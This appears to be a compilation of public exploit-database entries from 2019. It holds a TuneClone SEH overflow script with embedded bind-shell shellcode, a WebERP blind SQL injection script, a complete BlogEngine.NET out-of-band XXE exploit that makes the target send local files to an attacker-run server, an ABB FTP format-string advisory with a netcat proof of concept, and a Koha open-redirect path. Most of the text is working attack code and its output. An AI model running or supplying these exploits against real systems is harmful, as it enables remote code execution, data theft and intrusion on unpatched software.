/cgi-bin/koha/tracklinks.pl?biblionumber=[ID-NUMBER]&uri=//[REDIRECT-ADDRESS-HERE].gov

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

# Exploit Title: TuneClone Local Seh Exploit
# Date: 19.06.2019
# Vendor Homepage: http://www.tuneclone.com/
# Software Link:   http://www.tuneclone.com/tuneclone_setup.exe
# Exploit Author: Achilles
# Tested Version: 2.20
# Tested on: Windows XP SP3 EN

# 1.- Run python code : TuneClone.py
# 2.- Open EVIL.txt and copy content to Clipboard
# 3.- Open TuneClone and press Help and 'Enter License Code'
# 4.- Paste the Content of EVIL.txt into the 'Name and Code Field'
# 5.- Click 'OK' and you will have a bind shell port 3110.
# 6.- Greetings go:XiDreamzzXi,Metatron

#!/usr/bin/env python

import struct

buffer = "\x41" * 1056
nseh = "\xeb\x06\x90\x90" #jmp short 6
seh  =  struct.pack('<L',0x583411c0) #msaud32.acm
nops =  "\x90" * 20

#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python
#badchars "\x00\x0a\x0d"
shellcode = ("\xb8\xf4\xc0\x2a\xd0\xdb\xd8\xd9\x74\x24\xf4\x5a\x2b"
"\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\xb6\xce\xc8"
"\x25\xca\x27\x8e\xc6\x32\xb8\xef\x4f\xd7\x89\x2f\x2b"
"\x9c\xba\x9f\x3f\xf0\x36\x6b\x6d\xe0\xcd\x19\xba\x07"
"\x65\x97\x9c\x26\x76\x84\xdd\x29\xf4\xd7\x31\x89\xc5"
"\x17\x44\xc8\x02\x45\xa5\x98\xdb\x01\x18\x0c\x6f\x5f"
"\xa1\xa7\x23\x71\xa1\x54\xf3\x70\x80\xcb\x8f\x2a\x02"
"\xea\x5c\x47\x0b\xf4\x81\x62\xc5\x8f\x72\x18\xd4\x59"
"\x4b\xe1\x7b\xa4\x63\x10\x85\xe1\x44\xcb\xf0\x1b\xb7"
"\x76\x03\xd8\xc5\xac\x86\xfa\x6e\x26\x30\x26\x8e\xeb"
"\xa7\xad\x9c\x40\xa3\xe9\x80\x57\x60\x82\xbd\xdc\x87"
"\x44\x34\xa6\xa3\x40\x1c\x7c\xcd\xd1\xf8\xd3\xf2\x01"
"\xa3\x8c\x56\x4a\x4e\xd8\xea\x11\x07\x2d\xc7\xa9\xd7"
"\x39\x50\xda\xe5\xe6\xca\x74\x46\x6e\xd5\x83\xa9\x45"
"\xa1\x1b\x54\x66\xd2\x32\x93\x32\x82\x2c\x32\x3b\x49"
"\xac\xbb\xee\xe4\xa4\x1a\x41\x1b\x49\xdc\x31\x9b\xe1"
"\xb5\x5b\x14\xde\xa6\x63\xfe\x77\x4e\x9e\x01\x7b\xa9"
"\x17\xe7\xe9\xa5\x71\xbf\x85\x07\xa6\x08\x32\x77\x8c"
"\x20\xd4\x30\xc6\xf7\xdb\xc0\xcc\x5f\x4b\x4b\x03\x64"
"\x6a\x4c\x0e\xcc\xfb\xdb\xc4\x9d\x4e\x7d\xd8\xb7\x38"
"\x1e\x4b\x5c\xb8\x69\x70\xcb\xef\x3e\x46\x02\x65\xd3"
"\xf1\xbc\x9b\x2e\x67\x86\x1f\xf5\x54\x09\x9e\x78\xe0"
"\x2d\xb0\x44\xe9\x69\xe4\x18\xbc\x27\x52\xdf\x16\x86"
"\x0c\x89\xc5\x40\xd8\x4c\x26\x53\x9e\x50\x63\x25\x7e"
"\xe0\xda\x70\x81\xcd\x8a\x74\xfa\x33\x2b\x7a\xd1\xf7"
"\x5b\x31\x7b\x51\xf4\x9c\xee\xe3\x99\x1e\xc5\x20\xa4"
"\x9c\xef\xd8\x53\xbc\x9a\xdd\x18\x7a\x77\xac\x31\xef"
"\x77\x03\x31\x3a")
pad ="C" * (6000 - len(buffer) - len(nseh+seh) - len(nops) -len(shellcode))
payload = buffer + nseh + seh + nops + shellcode + pad

try:
  f=open("Evil.txt","w")
  print "[+] Creating %s bytes evil payload.." %len(payload)
  f.write(payload)
  f.close()
  print "[+] File created!"
except:
  print "File cannot be created"

# Exploit Title: Blind SQL injection in WebERP.
# Date: June 10, 2019
# Exploit Author: Semen Alexandrovich Lyhin (https://www.linkedin.com/in/semenlyhin/)
# Vendor Homepage: http://www.weberp.org/
# Version: 4.15

# A malicious query can be sent in base64 encoding to unserialize() function. It can be deserialized as an array without any sanitization then. 
# After it, each element of the array is passed directly to the SQL query. 

import requests
import base64
import os
import subprocess
from bs4 import BeautifulSoup
import re
import time
import sys

def generatePayload(PaidAmount="0",PaymentId="0"):
    #THIS FUNCTION IS INSECURE BY DESIGN
    ToSerialize = r"[\"%s\" => \"%s\"]" % (PaymentId, PaidAmount)
    return os.popen("php -r \"echo base64_encode(serialize(" + ToSerialize + "));\"").read()

def getCookies(ip, CompanyNameField, usr, pwd):
    r = requests.get("http://" + ip + "/index.php")
    s = BeautifulSoup(r.text, 'lxml')
    m = re.search("FormID.*>", r.text)
    FormID = m.group(0).split("\"")[2]

    data = {"FormID":FormID,"CompanyNameField":CompanyNameField,"UserNameEntryField":usr,"Password":pwd,"SubmitUser":"Login"}
    r = requests.post("http://" + ip + "/index.php", data)

    return {"PHPSESSIDwebERPteam":r.headers["Set-Cookie"][20:46]}


def addSupplierID(name, cookies, proxies):
    r = requests.get("http://" + ip + "/Suppliers.php", cookies=cookies)
    s = BeautifulSoup(r.text, 'lxml')
    m = re.search("FormID.*>", r.text)
    FormID = m.group(0).split("\"")[2]

    data = {"FormID":FormID,"New":"Yes","SupplierID":name,"SuppName":name,"SupplierType":"1","SupplierSince":"01/06/2019","BankPartics":"","BankRef":"0",
"PaymentTerms":"20","FactorID":"0","TaxRef":"","CurrCode":"USD","Remittance":"0","TaxGroup":"1","submit":"Insert+New+Supplier"}

    requests.post("http://" + ip + "/Suppliers.php", data=data,cookies=cookies,proxies=proxies)


def runExploit(cookies, supplier_id, payload, proxies):
    r = requests.get("http://" + ip + "/Payments.php", cookies=cookies)
    s = BeautifulSoup(r.text, 'lxml')
    m = re.search("FormID.*>", r.text)
    FormID = m.group(0).split("\"")[2]

    data = {"FormID":FormID,
"CommitBatch":"2",
"BankAccount":"1",
"DatePaid":"01/06/2019",
"PaidArray":payload}

    requests.post("http://" + ip + "/Payments.php?identifier=1559385755&SupplierID=" + supplier_id, data=data,cookies=cookies,proxies=proxies)


if __name__ == "__main__":
    #proxies = {'http':'127.0.0.1:8080'}
    proxies = {}

    if len(sys.argv) != 6:
        print '(+) usage: %s <target> <path> <login> <password> <order>' % sys.argv[0]
        print '(+) eg: %s 127.0.0.1 "weberp/webERP/" admin weberp 1' % sys.argv[0]
        print 'Order means the number of company on the website. Can be gathered from the login page and usually equals 0 or 1'
        exit()

    ip = sys.argv[1] + "/" + sys.argv[2]

    #if don't have php, set Payload to the next one to check this time-based SQLi: YToxOntpOjA7czoyMzoiMCB3aGVyZSBzbGVlcCgxKT0xOy0tIC0iO30=
    #payload = generatePayload("0 where sleep(1)=1;-- -", "0")

    payload = generatePayload("0", "' or sleep(5) and '1'='1")

    #get cookies
    cookies = getCookies(ip, sys.argv[5], sys.argv[3], sys.argv[4])

    addSupplierID("GARUMPAGE", cookies, proxies)

    t1 = time.time()
    runExploit(cookies, "GARUMPAGE", payload, proxies)
    t2 = time.time()

    if (t2-t1>4):
        print "Blind sqli is confirmed"
    else:
        print "Verify input data and try again"

# Exploit Title: Out-of-band XML External Entity Injection on BlogEngine.NET
# Date: 19 June 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://blogengine.io/
# Version: v3.3.7
# Tested on: 3.3.7, 3.3.6
# CVE : 2019-10718

#1. Description
#==============

#BlogEngine.NET is vulnerable to an Out-of-Band XML External Entity
#Injection attack on **/pingback.axd**.

#2. Proof of Concept
#=============

#Host the following malicious DTD on a web server that is accessible to the
#target system:

#~~~
#<!ENTITY % p1 SYSTEM "file:///C:/Windows/win.ini">
#<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://$LHOST/X?%p1;'>"> %p2
#~~~

#Submit a request to `pingback.axd` containing a malicious XML body:

#~~~{command="REQUEST"}
#POST /pingback.axd HTTP/1.1
#Host: $RHOST
#Accept-Encoding: gzip, deflate
#Connection: close
#User-Agent: python-requests/2.12.4
#Accept: */*
#Content-Type: text/xml
#Content-Length: 131

#<?xml version="1.0"?>
#<!DOCTYPE foo SYSTEM "http://$LHOST/ex.dtd">
#<foo>&e1;</foo>
#<methodName>pingback.ping</methodName>
#~~~

#The application will request the remote DTD and submit a subsequent request
#containing the contents of the file:

#~~~
#$RHOST - - [17/May/2019 12:03:32] "GET /ex.dtd HTTP/1.1" 200 -
#$RHOST - - [17/May/2019 12:03:32] "GET
#/X?;%20for%2016-bit%20app%20support%0D%0A[fonts]%0D%0A[extensions]%0D%0A[mci%20extensions]%0D%0A[files]%0D%0A[Mail]%0D%0AMAPI=1
#HTTP/1.1" 200 -
#~~~

#! /usr/bin/env python3
import argparse
import http.server
import json
import multiprocessing
import os
import re
import requests
import sys
import time
import urllib

"""
Exploit for CVE-2019-10718

CVE Identified by: Aaron Bishop
Exploit written by: Aaron Bishop

Submit a XML to the target, get the contents of the file in a follow up request from the target

python3 CVE-2019-10718.py --rhost http://$RHOST --lhost $LHOST --lport $LPORT --files C:/Windows/win.ini C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config C:/inetpub/wwwroot/iisstart.htm C:/Windows/iis.log C:/Users/Public/test.txt

Requesting C:/Windows/win.ini ...
$RHOST - - [16/May/2019 17:07:25] "GET /ex.dtd HTTP/1.1" 200 -
$RHOST - - [16/May/2019 17:07:25] "GET /X?;%20for%2016-bit%20app%20support%0D%0A[fonts]%0D%0A[extensions]%0D%0A[mci%20extensions]%0D%0A[files]%0D%0A[Mail]%0D%0AMAPI=1 HTTP/1.1" 200 -

Requesting C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config ...
$RHOST - - [16/May/2019 17:07:26] "GET /ex.dtd HTTP/1.1" 200 -
Unable to read C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config

Requesting C:/inetpub/wwwroot/iisstart.htm ...
$RHOST - - [16/May/2019 17:07:30] "GET /ex.dtd HTTP/1.1" 200 -
Unable to read C:/inetpub/wwwroot/iisstart.htm

Requesting C:/Windows/iis.log ...
$RHOST - - [16/May/2019 17:07:34] "GET /ex.dtd HTTP/1.1" 200 -
Unable to read C:/Windows/iis.log

Requesting C:/Users/Public/test.txt ...
$RHOST - - [16/May/2019 17:07:38] "GET /ex.dtd HTTP/1.1" 200 -
$RHOST - - [16/May/2019 17:07:38] "GET /X?This%20is%20a%20test HTTP/1.1" 200 -

"""

xml = """<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://{lhost}:{lport}/ex.dtd">
<foo>&e1;</foo>
<methodName>pingback.ping</methodName>
"""

dtd = """<!ENTITY % p1 SYSTEM "file:///{fname}">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://{lhost}:{lport}/X?%p1;'>"> %p2;
"""

proxies = {
"http": "127.0.0.1:8080",
"https": "127.0.0.1:8080"
          }

file_queue = multiprocessing.Queue()
response_queue = multiprocessing.Queue()
response_counter = multiprocessing.Value('i', 0)

class S(http.server.SimpleHTTPRequestHandler):
    server_version = 'A Patchey Webserver'
    sys_version = '3.1415926535897932384626433832795028841971693993751058209749445923078'
    error_message_format = 'Donde esta la biblioteca?'

    def _set_headers(self):
            self.send_response(200)
            self.send_header('Content-Type', 'application/xml')
            self.end_headers()

    def do_GET(self):
        if self.path.endswith(".dtd"):
            self._set_headers()
            self.wfile.write(dtd.format(fname=file_queue.get(), lhost=self.lhost, lport=self.lport).encode('utf-8'))
        elif self.path.startswith("/X"):
            self._set_headers()
            response_counter.value += 1
            response_queue.put(self.path)
            self.wfile.write('<response>Thanks</response>'.encode('utf-8'))
        else:
            self._set_headers()
            self.wfile.write('<error>?</error>')


def start_server(lhost, lport, server):
    httpd = http.server.HTTPServer((lhost, lport), server)
    httpd.serve_forever()

def main(rhost, lhost, lport, files, timeout, proxy, output_dir):
    print(output_dir)
    if not output_dir:
        return
    for f in files:
        file_queue.put_nowait(f)

    server = S
    server.lhost, server.lport = lhost, lport
    p = multiprocessing.Process(target=start_server, args=(lhost,lport,server))
    p.start()
    for num, f in enumerate(files):
        print("\nRequesting {} ...".format(f))
        count = 0
        r = requests.post(rhost + "/pingback.axd", data=xml.format(lhost=lhost, lport=lport), proxies=proxies if proxy else {}, headers={"Content-Type": "text/xml"})
        response = True
        while num == response_counter.value:
            if count >= timeout:
                response = False
                response_counter.value += 1
                print("Unable to read {}".format(f))
                break
            time.sleep(1)
            count += 1
        if response:
            os.makedirs(output_dir, exist_ok=True)
            with open("{}/{}".format(output_dir, os.path.splitdrive(f)[1].replace(':','').replace('/','_')), 'w') as fh:
                fh.write(urllib.parse.unquote(response_queue.get()).replace('/X?',''))

    p.terminate()


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit CVE-2019-10718 OOB XXE')
    parser.add_argument('-r', '--rhost', action="store", dest="rhost", required=True, help='Target host')
    parser.add_argument('-l', '--lhost', action="store", dest="lhost", required=True, help='Local host')
    parser.add_argument('-p', '--lport', action="store", dest="lport", type=int, required=True, help='Local port')
    parser.add_argument('-f', '--files', nargs='+', default="C:/Windows/win.ini", help='Files to read on RHOST')
    parser.add_argument('-t', '--timeout', type=int, default=3, help='How long to wait before moving on to next file')
    parser.add_argument('-x', '--proxy', dest="proxy", action="store_true", default=False, help='Pass requests through a proxy')
    parser.add_argument('-o', '--output', nargs='?', default="./CVE-2019-10718", help='Output directory.  Default ./CVE-2019-10718')
    args = parser.parse_args()

    if isinstance(args.files, str):
        args.files = [args.files]
    main(args.rhost, args.lhost, args.lport, args.files, args.timeout, args.proxy, args.output)

XL-19-004 - ABB IDAL FTP Server Uncontrolled Format String Vulnerability
========================================================================

Identifiers
-----------
XL-19-004
CVE-2019-7230
ABBVU-IAMF-1902008


CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)


Affected vendor
---------------
ABB (new.abb.com)


Credit
------
Eldar Marcussen - xen1thLabs - Software Labs


Vulnerability summary
---------------------
The IDAL FTP server is vulnerable to memory corruption through insecure use of user supplied format strings. An attacker can abuse this functionality to bypass authentication or execute code on the server.


Technical details
-----------------
The IDAL FTP server does not safely handle username strings during the authentication process. Attempting to authenticate with the username `%s%p%x%d` will crash the server. Sending `%08x.AAAA.%08x.%08x` will log memory content from the stack.


Proof of concept
----------------
```
perl -e 'print "USER %08x.AAAA.%08x.%08x\r\nPASS xen1thLabs\r\n";' | nc targetip 22
````

    UserManagementModule::isUserExist failed. "72657355.AAAA.616e614d.656d6567" not present in UserFactory
    UserManagementModule::LoginFTPUser failed. User :"72657355.AAAA.616e614d.656d6567" not present in UserFactory


Affected systems
----------------
PB610 Panel Builder 600, order code: 1SAP500900R0101, versions 1.91 ... 2.8.0.367


Solution
--------
Apply the patches and instructions from vendor:
 - ABB PB610 - https://search.abb.com/library/Download.aspx?DocumentID=3ADR010377&LanguageCode=en&DocumentPartId=&Action=Launch


Disclosure timeline
-------------------
04/02/2019 - Contacted ABB requesting disclosure coordination
05/02/2019 - Provided vulnerability details
05/06/2019 - Patch available
17/06/2019 - xen1thLabs public disclosure